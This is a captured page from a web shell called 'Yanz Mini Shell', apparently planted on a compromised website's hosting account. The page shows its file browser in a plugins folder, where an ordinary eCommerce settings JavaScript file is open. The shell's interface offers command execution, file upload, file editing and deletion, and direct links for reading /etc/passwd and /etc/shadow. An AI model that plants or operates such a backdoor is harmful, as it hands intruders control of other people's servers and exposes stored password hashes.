Yanz Mini Shell
[_]
[-]
[X]
[
HomeShell 1
] [
HomeShell 2
] [
Upload
] [
Command Shell
] [
Scripting
] [
About
]
[ Directory ] =>
/
home
firstmatrixcoin
public_html
ocean-arc.firstmatrix.co.in
plugins
sparkline
Action
[*]
New File
[*]
New Folder
Sensitive File
[*]
/etc/passwd
[*]
/etc/shadow
[*]
/etc/resolv.conf
[
Delete
] [
Edit
] [
Rename
] [
Back
]
/** * App eCommerce Settings Script */ 'use strict'; //Javascript to handle the e-commerce settings page $(function () { // Select2 var select2 = $('.select2'); if (select2.length) { select2.each(function () { var $this = $(this); select2Focus($this); $this.wrap('<div class="position-relative"></div>').select2({ dropdownParent: $this.parent(), placeholder: $this.data('placeholder') // for dynamic placeholder }); }); } }); (function () { // Phone Number const phoneMaskList = document.querySelectorAll('.phone-mask'); if (phoneMaskList) { phoneMaskList.forEach(function (phoneMask) { new Cleave(phoneMask, { phone: true, phoneRegionCode: 'US' }); }); } })();
Free Space : 11678855168 Byte